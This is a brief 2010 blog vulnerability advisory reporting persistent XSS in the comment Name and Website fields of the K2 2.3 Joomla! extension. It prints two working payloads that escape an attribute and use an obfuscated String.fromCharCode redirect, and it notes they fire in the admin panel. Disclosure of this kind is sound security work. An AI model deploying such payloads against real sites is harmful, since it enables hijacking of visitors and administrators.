jeffchannell.com

K2 2.3 Persistent XSS Vulnerability

Posted in Joomla!
2010-09-11 17:08:28 +0000 UTC

K2 v2.3, the popular Joomla! CCK extension, suffers from persistent XSS vulnerabilities in its comment facility.

Comment "Name" Field Persistent XSS

" style="position:absolute;top:0px;left:0px;width:99em;height:99em" onmouseover="location.href=String.fromCharCode(104,116,116,112,58,47,47,106,101,102,102,99,104, 97,110,110,101,108,108,46,99,111,109)

Comment "Website" Field Persistent XSS

" style="position:absolute;top:0px;left:0px;width:99em;height:99em" onmouseover="location.href=String.fromCharCode(104,116,116,112,58,47,47,106,101,102,102,99,104, 97,110,110,101,108,108,46,99,111,109)

NOTE: also executes in admin!

Timeline